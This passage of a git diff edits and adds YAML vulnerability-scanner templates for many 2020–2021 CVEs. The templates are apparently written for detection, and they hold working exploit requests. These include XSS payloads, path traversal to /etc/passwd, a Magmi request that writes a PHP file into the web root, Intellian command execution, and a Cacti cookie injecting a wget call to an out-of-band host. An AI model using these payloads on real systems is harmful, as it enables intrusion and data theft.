- verified: false
- tags: xss,wordpress,wp-theme,wp,cve,cve2020
+ verified: "false"
+ max-request: 1
+ vendor: codetipi
+ product: 15zine
+ framework: wordpress
+ tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi
-requests:
+http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
@@ -38,5 +50,4 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/08/14
+# digest: 4a0a004730450220446ad83f55668169ec8d86cdb517ce3c0a10e62b8842feac2099a3ba1e40bbfb022100bd74e57eca1f513a0e248cc3bce01375a08d0f07161fd3ccf9980af8759c6c18:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-5405.yaml b/poc/cve/cve-2020-5405.yaml
new file mode 100644
index 0000000000..73a539a58a
--- /dev/null
+++ b/poc/cve/cve-2020-5405.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-5405
+
+info:
+ name: Spring Cloud Directory Traversal
+ author: harshbothra_
+ severity: medium
+ description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server
+ module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
+ reference:
+ - https://pivotal.io/security/cve-2020-5405
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2020-5405
+ cwe-id: CWE-22
+ tags: cve,cve2020,lfi,springcloud
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
diff --git a/poc/cve/cve-2020-5776.yaml b/poc/cve/cve-2020-5776.yaml
index 0c7e24a866..e6ea2bc21c 100644
--- a/poc/cve/cve-2020-5776.yaml
+++ b/poc/cve/cve-2020-5776.yaml
@@ -5,26 +5,28 @@ info:
author: dwisiswant0
severity: high
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
-
- # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
- # in the event that a CSRF is leveraged against an existing admin session for MAGMI.
- # At the time of this advisory, no patch exists for this issue.
- # Ref:
- # - https://nvd.nist.gov/vuln/detail/CVE-2020-5776
+ reference:
+ - https://www.tenable.com/security/research/tra-2020-51
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2020-5776
+ cwe-id: CWE-352
+ tags: cve,cve2020,magmi,magento
requests:
- raw:
- |
POST /magmi/web/magmi_saveprofile.php HTTP/1.1
Host: {{Hostname}}
- Content-type: application/x-www-form-urlencoded
+ Content-Type: application/x-www-form-urlencoded
Connection: close
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
- |
POST /magmi/web/magmi_run.php HTTP/1.1
Host: {{Hostname}}
- Content-type: application/x-www-form-urlencoded
+ Content-Type: application/x-www-form-urlencoded
Connection: close
engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
diff --git a/poc/cve/cve-2020-6171.yaml b/poc/cve/cve-2020-6171.yaml
new file mode 100644
index 0000000000..0e963ed130
--- /dev/null
+++ b/poc/cve/cve-2020-6171.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-6171
+
+info:
+ name: CLink Office v2 XSS
+ author: pikpikcu
+ severity: medium
+ description: |
+ A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-6171
+ - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-6171
+ cwe-id: CWE-79
+ tags: cve,cve2020,xss,clink-office
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '">'
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/poc/cve/cve-2020-6308.yaml b/poc/cve/cve-2020-6308.yaml
new file mode 100644
index 0000000000..492514c99f
--- /dev/null
+++ b/poc/cve/cve-2020-6308.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-6308
+
+info:
+ name: Unauthenticated Blind SSRF in SAP
+ author: madrobot
+ severity: medium
+ description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
+ reference:
+ - https://github.com/InitRoot/CVE-2020-6308-PoC
+ - https://launchpad.support.sap.com/#/notes/2943844
+ - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2020-6308
+ cwe-id: CWE-918
+ tags: cve,cve2020,sap,ssrf,oast,blind
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
+
+ body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
diff --git a/poc/cve/cve-2020-7136.yaml b/poc/cve/cve-2020-7136.yaml
index ec212016bf..1702a00b91 100644
--- a/poc/cve/cve-2020-7136.yaml
+++ b/poc/cve/cve-2020-7136.yaml
@@ -1,17 +1,19 @@
id: CVE-2020-7136
info:
- name: HPE Smart Update Manager - Remote Unauthorized Access
+ name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
author: gy741
severity: critical
- description: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
+ description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
reference:
- https://www.tenable.com/security/research/tra-2020-02
- https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
- https://nvd.nist.gov/vuln/detail/CVE-2020-7136
+ - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
+ remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
classification:
- cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
cve-id: CVE-2020-7136
cwe-id: CWE-288
tags: cve,cve2020,hp,auth-bypass,hpe
@@ -47,3 +49,5 @@ requests:
part: body
regex:
- '"sessionId":"([a-z0-9.]+)"'
+
+# Enhanced by mp on 2022/04/29
diff --git a/poc/cve/cve-2020-7247.yaml b/poc/cve/cve-2020-7247.yaml
index b67f74c07c..a54d564c36 100644
--- a/poc/cve/cve-2020-7247.yaml
+++ b/poc/cve/cve-2020-7247.yaml
@@ -1,18 +1,21 @@
id: CVE-2020-7247
info:
- name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
+ name: OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution
author: princechaddha
severity: critical
+ description: |
+ OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
reference:
- https://www.openwall.com/lists/oss-security/2020/01/28/3
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247
+ - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
+ - http://www.openwall.com/lists/oss-security/2020/01/28/3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2020-7247
cwe-id: CWE-78,CWE-755
- description: "OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
network:
@@ -46,4 +49,4 @@ network:
words:
- "Message accepted for delivery"
-# Enhanced by mp on 2022/04/04
+# Enhanced by mp on 2022/04/29
diff --git a/poc/cve/cve-2020-7796.yaml b/poc/cve/cve-2020-7796.yaml
index bf0dae4846..8c94eb0c98 100644
--- a/poc/cve/cve-2020-7796.yaml
+++ b/poc/cve/cve-2020-7796.yaml
@@ -1,18 +1,20 @@
id: CVE-2020-7796
info:
- name: Zimbra Collaboration Suite (ZCS) - SSRF
+ name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery
author: gy741
severity: critical
- description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
+ description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.
reference:
- https://www.adminxe.com/2183.html
- tags: cve,cve2020,zimbra,ssrf,oast
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-7796
+ - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2020-7796
cwe-id: CWE-918
+ tags: cve,cve2020,zimbra,ssrf,oast
requests:
- raw:
@@ -25,3 +27,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
+
+# Enhanced by mp on 2022/04/29
diff --git a/poc/cve/cve-2020-7943.yaml b/poc/cve/cve-2020-7943.yaml
index 1f5454db70..10c78e21ad 100644
--- a/poc/cve/cve-2020-7943.yaml
+++ b/poc/cve/cve-2020-7943.yaml
@@ -2,16 +2,17 @@ id: CVE-2020-7943
info:
name: Puppet Server and PuppetDB sensitive information disclosure
- severity: high
author: c-sh0
+ severity: high
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
reference:
- https://puppet.com/security/cve/CVE-2020-7943
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
- https://tickets.puppetlabs.com/browse/PDB-4876
+ - https://puppet.com/security/cve/CVE-2020-7943/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2020-7943
cwe-id: CWE-276
tags: cve,cve2020,puppet,exposure
diff --git a/poc/cve/cve-2020-7980.yaml b/poc/cve/cve-2020-7980.yaml
new file mode 100644
index 0000000000..b3a656ea66
--- /dev/null
+++ b/poc/cve/cve-2020-7980.yaml
@@ -0,0 +1,55 @@
+id: CVE-2020-7980
+
+info:
+ name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
+ author: ritikchaddha
+ severity: critical
+ description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'
+ impact: |
+ Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
+ remediation: |
+ Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-7980
+ - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
+ - https://github.com/Xh4H/Satellian-CVE-2020-7980
+ - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
+ - https://github.com/0xT11/CVE-POC
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-7980
+ cwe-id: CWE-78
+ epss-score: 0.97015
+ epss-percentile: 0.99726
+ cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: intelliantech
+ product: aptus_web
+ shodan-query: http.title:"Intellian Aptus Web"
+ tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech
+
+http:
+ - raw:
+ - |
+ POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Cookie: ctr_t=0; sid=123456789
+
+ {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+# digest: 490a00463044022031d1966241ed308968ef852360775530e3798312c51bffd3e2011ddff009f30d0220601bed4b817baee1e1404f921e52a663759eec3f11e4a03015b7cb839fa416e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-8115.yaml b/poc/cve/cve-2020-8115.yaml
index 34775d22a2..aecdd7b672 100644
--- a/poc/cve/cve-2020-8115.yaml
+++ b/poc/cve/cve-2020-8115.yaml
@@ -2,8 +2,19 @@ id: CVE-2020-8115
info:
name: Revive Adserver XSS
- author: madrobot & dwisiswant0
+ author: madrobot,dwisiswant0
severity: medium
+ description: |
+ A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
+ reference:
+ - https://hackerone.com/reports/775693
+ - https://www.revive-adserver.com/security/revive-sa-2020-001/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-8115
+ cwe-id: CWE-79
+ tags: cve,cve2020,xss
requests:
- method: GET
diff --git a/poc/cve/cve-2020-8194.yaml b/poc/cve/cve-2020-8194.yaml
new file mode 100644
index 0000000000..a2146b54f0
--- /dev/null
+++ b/poc/cve/cve-2020-8194.yaml
@@ -0,0 +1,39 @@
+id: CVE-2020-8194
+
+info:
+ name: Citrix ADC & NetScaler Gateway Reflected Code Injection
+ author: dwisiswant0
+ severity: medium
+ description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and
+ 10.2.7 allows the modification of a file download.
+ reference:
+ - https://support.citrix.com/article/CTX276688
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2020-8194
+ cwe-id: CWE-94
+ tags: cve,cve2020,citrix
+
+requests:
+ - raw:
+ - |
+ GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: startupapp=st
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ words:
+ - "application/x-java-jnlp-file"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2020-8497.yaml b/poc/cve/cve-2020-8497.yaml
index 14601fef0a..ac9da84e0f 100644
--- a/poc/cve/cve-2020-8497.yaml
+++ b/poc/cve/cve-2020-8497.yaml
@@ -9,8 +9,8 @@ info:
- https://k4m1ll0.com/cve-2020-8497.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-8497
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 5.30
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
cve-id: CVE-2020-8497
cwe-id: CWE-306
tags: cve,cve2020,fms,artica
diff --git a/poc/cve/cve-2020-8644.yaml b/poc/cve/cve-2020-8644.yaml
index 9f91299c9c..ddeb6aaefd 100644
--- a/poc/cve/cve-2020-8644.yaml
+++ b/poc/cve/cve-2020-8644.yaml
@@ -55,4 +55,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/07/07
+# Enhanced by mp on 2022/07/07
\ No newline at end of file
diff --git a/poc/cve/cve-2020-8654.yaml b/poc/cve/cve-2020-8654.yaml
index 6e915a1b20..9f41122e5c 100644
--- a/poc/cve/cve-2020-8654.yaml
+++ b/poc/cve/cve-2020-8654.yaml
@@ -1,36 +1,39 @@
id: CVE-2020-8654
info:
- name: EyesOfNetwork 5.3 - Authenticated RCE
+ name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
author: praetorian-thendrickson
severity: high
- description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi).
+ description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
+ impact: |
+ Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system.
+ remediation: |
+ Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities.
reference:
- https://github.com/h4knet/eonrce
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
- - https://nvd.nist.gov/vuln/detail/CVE-2020-8657
- https://github.com/EyesOfNetworkCommunity/eonweb/issues/50
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-8654
+ - https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-8654
cwe-id: CWE-78
- tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated
+ epss-score: 0.04987
+ epss-percentile: 0.92656
+ cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: eyesofnetwork
+ product: eyesofnetwork
+ tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/css/eonweb.css"
- extractors:
- - type: regex
- name: version
- internal: true
- part: body
- group: 1
- regex:
- - '# VERSION : ([0-9.]+)'
-
matchers-condition: and
matchers:
- type: dsl
@@ -45,3 +48,13 @@ requests:
- type: status
status:
- 200
+
+ extractors:
+ - type: regex
+ name: version
+ group: 1
+ regex:
+ - "# VERSION : ([0-9.]+)"
+ internal: true
+ part: body
+# digest: 4a0a0047304502207ebd6b469ac0bd67dd7bc462fa62ef88bde2a9cb294df7a70aecebfd8f51f913022100be00ea371f5c1dbe5dd0833ee69f20b921c315d38f0cca3ba9d8e3af3b938674:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-8813.yaml b/poc/cve/cve-2020-8813.yaml
new file mode 100644
index 0000000000..3636aae3bc
--- /dev/null
+++ b/poc/cve/cve-2020-8813.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-8813
+
+info:
+ name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
+ author: gy741
+ severity: high
+ description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
+ reference:
+ - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
+ - https://github.com/Cacti/cacti/releases
+ - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
+ - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2020-8813
+ cwe-id: CWE-78
+ tags: cve,cve2020,cacti,rce,oast
+
+requests:
+ - raw:
+ - |
+ GET /graph_realtime.php?action=init HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/poc/cve/cve-2020-9047.yaml b/poc/cve/cve-2020-9047.yaml
index 4761bac1d4..90d8a3501c 100644
--- a/poc/cve/cve-2020-9047.yaml
+++ b/poc/cve/cve-2020-9047.yaml
@@ -15,9 +15,16 @@ info:
An attacker with administrative privileges could potentially
download and run a malicious executable that
could allow OS command injection on the system.
-
- Source/References:
+ reference:
- https://github.com/norrismw/CVE-2020-9047
+ - https://www.johnsoncontrols.com/cyber-solutions/security-advisories
+ - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2020-9047
+ cwe-id: CWE-347
+ tags: cve,cve2020,rce,exacqvision,service
requests:
- method: GET
diff --git a/poc/cve/cve-2020-9054.yaml b/poc/cve/cve-2020-9054.yaml
index 4c74eec890..dfaeba128c 100644
--- a/poc/cve/cve-2020-9054.yaml
+++ b/poc/cve/cve-2020-9054.yaml
@@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-9054
cwe-id: CWE-78
- tags: cve,cve2020,rce,zyxel,injection,kev
+ tags: cve,cve2020,rce,zyxel,injection
requests:
- method: GET
diff --git a/poc/cve/cve-2021-20092.yaml b/poc/cve/cve-2021-20092.yaml
index 6ac3015c2c..7a029962c1 100644
--- a/poc/cve/cve-2021-20092.yaml
+++ b/poc/cve/cve-2021-20092.yaml
@@ -12,7 +12,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2021-20092
cwe-id: CWE-200
tags: cve,cve2021,buffalo,firmware,iot
diff --git a/poc/cve/cve-2021-20150.yaml b/poc/cve/cve-2021-20150.yaml
index 0e144f4cd1..af8daab9cc 100644
--- a/poc/cve/cve-2021-20150.yaml
+++ b/poc/cve/cve-2021-20150.yaml
@@ -9,8 +9,8 @@ info:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 5.30
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
cve-id: CVE-2021-20150
cwe-id: CWE-287
metadata:
diff --git a/poc/cve/cve-2021-20792.yaml b/poc/cve/cve-2021-20792.yaml
index c5856c90db..8430ef6363 100644
--- a/poc/cve/cve-2021-20792.yaml
+++ b/poc/cve/cve-2021-20792.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
- https://nvd.nist.gov/vuln/detail/CVE-2021-20792
+ - https://quizandsurveymaster.com/
+ - https://jvn.jp/en/jp/JVN65388002/index.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-20792
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin,authenticated
diff --git a/poc/cve/cve-2021-21972.yaml b/poc/cve/cve-2021-21972.yaml
new file mode 100644
index 0000000000..08a5fd002f
--- /dev/null
+++ b/poc/cve/cve-2021-21972.yaml
@@ -0,0 +1,39 @@
+id: CVE-2021-21972
+
+info:
+ name: VMware vSphere Client (HTML5) - Remote Code Execution
+ author: dwisiswant0
+ severity: critical
+ description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+ reference:
+ - https://swarm.ptsecurity.com/unauth-rce-vmware/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21972
+ - https://www.vmware.com/security/advisories/VMSA-2021-0002.html
+ - http://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-21972
+ cwe-id: CWE-269
+ tags: cve,cve2021,vmware,rce,vcenter
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "VSPHERE-UI-JSESSIONID"
+ part: header
+ condition: and
+ - type: regex
+ regex:
+ - "(Install|Config) Final Progress"
+ part: body
+
+# Enhanced by mp on 2022/05/05
diff --git a/poc/cve/cve-2021-21978.yaml b/poc/cve/cve-2021-21978.yaml
index db2e2800a8..51513779bc 100644
--- a/poc/cve/cve-2021-21978.yaml
+++ b/poc/cve/cve-2021-21978.yaml
@@ -8,8 +8,6 @@ info:
VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
- remediation: |
- Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability.
reference:
